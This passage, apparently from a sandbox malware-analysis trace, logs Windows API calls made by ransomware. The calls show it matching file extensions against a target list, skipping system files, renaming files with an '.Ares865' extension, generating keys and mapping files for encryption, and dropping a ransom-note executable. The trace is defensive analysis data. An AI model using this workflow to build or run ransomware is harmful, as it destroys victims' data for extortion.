(lpString="vvv") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.386] lstrlenW (lpString="wdb") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.386] lstrlenW (lpString="wmdb") returned 4 [0085.386] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.386] lstrlenW (lpString="wrk") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.386] lstrlenW (lpString="xdb") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.386] lstrlenW (lpString="xld") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.386] lstrlenW (lpString="xmlff") returned 5 [0085.386] lstrcmpiW (lpString1="1.bmp", lpString2="xmlff") returned -1 [0085.386] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp.Ares865") returned 90 [0085.386] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp.ares865"), dwFlags=0x1) returned 1 [0085.387] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.388] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.388] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.388] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.389] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.389] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.389] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.392] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.395] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.395] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.395] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2="aoldtz.exe") returned 1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2=".") returned 1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2="..") returned 1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2="windows") returned -1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2="bootmgr") returned 1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2="temp") returned 1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2="pagefile.sys") returned 1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2="boot") returned 1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2="ids.txt") returned 1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2="ntuser.dat") returned 1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2="perflogs") returned 1 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2="MSBuild") returned 1 [0085.397] lstrlenW (lpString="usertile42.bmp") returned 14 [0085.397] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp") returned 82 [0085.397] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile42.bmp" | out: lpString1="usertile42.bmp") returned="usertile42.bmp" [0085.397] lstrlenW (lpString="usertile42.bmp") returned 14 [0085.397] lstrlenW (lpString="Ares865") returned 7 [0085.397] lstrcmpiW (lpString1="e42.bmp", lpString2="Ares865") returned 1 [0085.397] lstrlenW (lpString=".dll") returned 4 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2=".dll") returned 1 [0085.397] lstrlenW (lpString=".lnk") returned 4 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2=".lnk") returned 1 [0085.397] lstrlenW (lpString=".ini") returned 4 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2=".ini") returned 1 [0085.397] lstrlenW (lpString=".sys") returned 4 [0085.397] lstrcmpiW (lpString1="usertile42.bmp", lpString2=".sys") returned 1 [0085.397] lstrlenW (lpString="usertile42.bmp") returned 14 [0085.397] lstrlenW (lpString="bak") returned 3 [0085.397] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.398] lstrlenW (lpString="ba_") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.398] lstrlenW (lpString="dbb") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.398] lstrlenW (lpString="vmdk") returned 4 [0085.398] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.398] lstrlenW (lpString="rar") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.398] lstrlenW (lpString="zip") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.398] lstrlenW (lpString="tgz") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.398] lstrlenW (lpString="vbox") returned 4 [0085.398] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.398] lstrlenW (lpString="vdi") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.398] lstrlenW (lpString="vhd") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.398] lstrlenW (lpString="vhdx") returned 4 [0085.398] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.398] lstrlenW (lpString="avhd") returned 4 [0085.398] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.398] lstrlenW (lpString="db") returned 2 [0085.398] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.398] lstrlenW (lpString="db2") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.398] lstrlenW (lpString="db3") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.398] lstrlenW (lpString="dbf") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.398] lstrlenW (lpString="mdf") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.398] lstrlenW (lpString="mdb") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.398] lstrlenW (lpString="sql") returned 3 [0085.398] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.398] lstrlenW (lpString="sqlite") returned 6 [0085.399] lstrcmpiW (lpString1="42.bmp", lpString2="sqlite") returned -1 [0085.399] lstrlenW (lpString="sqlite3") returned 7 [0085.399] lstrcmpiW (lpString1="e42.bmp", lpString2="sqlite3") returned -1 [0085.399] lstrlenW (lpString="sqlitedb") returned 8 [0085.399] lstrcmpiW (lpString1="le42.bmp", lpString2="sqlitedb") returned -1 [0085.399] lstrlenW (lpString="xml") returned 3 [0085.399] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.399] lstrlenW (lpString="$er") returned 3 [0085.399] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.399] lstrlenW (lpString="4dd") returned 3 [0085.399] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.399] lstrlenW (lpString="4dl") returned 3 [0085.399] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.399] lstrlenW (lpString="^^^") returned 3 [0085.399] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.399] lstrlenW (lpString="abs") returned 3 [0085.399] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.399] lstrlenW (lpString="abx") returned 3 [0085.399] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.399] lstrlenW (lpString="accdb") returned 5 [0085.399] lstrcmpiW (lpString1="2.bmp", lpString2="accdb") returned -1 [0085.399] lstrlenW (lpString="accdc") returned 5 [0085.399] lstrcmpiW (lpString1="2.bmp", lpString2="accdc") returned -1 [0085.399] lstrlenW (lpString="accde") returned 5 [0085.399] lstrcmpiW (lpString1="2.bmp", lpString2="accde") returned -1 [0085.399] lstrlenW (lpString="accdr") returned 5 [0085.399] lstrcmpiW (lpString1="2.bmp", lpString2="accdr") returned -1 [0085.399] lstrlenW (lpString="accdt") returned 5 [0085.399] lstrcmpiW (lpString1="2.bmp", lpString2="accdt") returned -1 [0085.399] lstrlenW (lpString="accdw") returned 5 [0085.399] lstrcmpiW (lpString1="2.bmp", lpString2="accdw") returned -1 [0085.399] lstrlenW (lpString="accft") returned 5 [0085.399] lstrcmpiW (lpString1="2.bmp", lpString2="accft") returned -1 [0085.399] lstrlenW (lpString="adb") returned 3 [0085.399] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.399] lstrlenW (lpString="adb") returned 3 [0085.399] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.400] lstrlenW (lpString="ade") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.400] lstrlenW (lpString="adf") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.400] lstrlenW (lpString="adn") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.400] lstrlenW (lpString="adp") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.400] lstrlenW (lpString="alf") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.400] lstrlenW (lpString="ask") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.400] lstrlenW (lpString="btr") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.400] lstrlenW (lpString="cat") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.400] lstrlenW (lpString="cdb") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.400] lstrlenW (lpString="ckp") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.400] lstrlenW (lpString="cma") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.400] lstrlenW (lpString="cpd") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.400] lstrlenW (lpString="dacpac") returned 6 [0085.400] lstrcmpiW (lpString1="42.bmp", lpString2="dacpac") returned -1 [0085.400] lstrlenW (lpString="dad") returned 3 [0085.400] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.400] lstrlenW (lpString="dadiagrams") returned 10 [0085.400] lstrcmpiW (lpString1="tile42.bmp", lpString2="dadiagrams") returned 1 [0085.400] lstrlenW (lpString="daschema") returned 8 [0085.400] lstrcmpiW (lpString1="le42.bmp", lpString2="daschema") returned 1 [0085.400] lstrlenW (lpString="db-journal") returned 10 [0085.400] lstrcmpiW (lpString1="tile42.bmp", lpString2="db-journal") returned 1 [0085.400] lstrlenW (lpString="db-shm") returned 6 [0085.400] lstrcmpiW (lpString1="42.bmp", lpString2="db-shm") returned -1 [0085.400] lstrlenW (lpString="db-wal") returned 6 [0085.400] lstrcmpiW (lpString1="42.bmp", lpString2="db-wal") returned -1 [0085.401] lstrlenW (lpString="dbc") returned 3 [0085.401] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.401] lstrlenW (lpString="dbs") returned 3 [0085.401] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.401] lstrlenW (lpString="dbt") returned 3 [0085.401] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.401] lstrlenW (lpString="dbv") returned 3 [0085.401] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.401] lstrlenW (lpString="dbx") returned 3 [0085.401] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.401] lstrlenW (lpString="dcb") returned 3 [0085.401] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.401] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp.Ares865") returned 90 [0085.401] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp.ares865"), dwFlags=0x1) returned 1 [0085.402] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.402] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.403] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.403] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.403] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.403] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.405] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.410] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.410] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.410] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.412] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp.Ares865") returned 90 [0085.412] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp.ares865"), dwFlags=0x1) returned 1 [0085.412] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.413] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.413] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.414] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.414] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.414] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.415] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.419] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.419] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.420] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.421] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp.Ares865") returned 90 [0085.421] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp.ares865"), dwFlags=0x1) returned 1 [0085.422] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.422] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.422] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.423] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.423] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.423] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.424] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.428] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.429] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.429] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.430] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Search", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search") returned="C:\\Users\\All Users\\Microsoft\\Search" [0085.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eeb00 | out: hHeap=0x2b0000) returned 1 [0085.430] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0085.430] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search") returned 35 [0085.430] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Search" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search") returned="C:\\Users\\All Users\\Microsoft\\Search" [0085.430] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0085.430] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Search\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\search\\how to back your files.exe"), bFailIfExists=1) returned 0 [0085.431] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.431] GetLastError () returned 0x0 [0085.431] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0085.431] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0085.431] CloseHandle (hObject=0x120) returned 1 [0085.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0085.432] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0085.432] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c551220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0085.432] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.432] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0085.432] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.432] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c551220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.432] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.432] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0085.432] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.432] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.432] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c551220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Data", cAlternateFileName="")) returned 1 [0085.432] lstrcmpiW (lpString1="Data", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.432] lstrcmpiW (lpString1="Data", lpString2="aoldtz.exe") returned 1 [0085.432] lstrcmpiW (lpString1="Data", lpString2=".") returned 1 [0085.432] lstrcmpiW (lpString1="Data", lpString2="..") returned 1 [0085.432] lstrcmpiW (lpString1="Data", lpString2="windows") returned -1 [0085.432] lstrcmpiW (lpString1="Data", lpString2="bootmgr") returned 1 [0085.432] lstrcmpiW (lpString1="Data", lpString2="temp") returned -1 [0085.432] lstrcmpiW (lpString1="Data", lpString2="pagefile.sys") returned -1 [0085.432] lstrcmpiW (lpString1="Data", lpString2="boot") returned 1 [0085.432] lstrcmpiW (lpString1="Data", lpString2="ids.txt") returned -1 [0085.432] lstrcmpiW (lpString1="Data", lpString2="ntuser.dat") returned -1 [0085.432] lstrcmpiW (lpString1="Data", lpString2="perflogs") returned -1 [0085.432] lstrcmpiW (lpString1="Data", lpString2="MSBuild") returned -1 [0085.432] lstrlenW (lpString="Data") returned 4 [0085.432] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\*") returned 37 [0085.432] lstrcpyW (in: lpString1=0x2cce448, lpString2="Data" | out: lpString1="Data") returned="Data" [0085.432] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0085.433] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x52) returned 0x2df8f0 [0085.433] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0085.433] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c551220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0085.433] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0085.433] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c551220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, 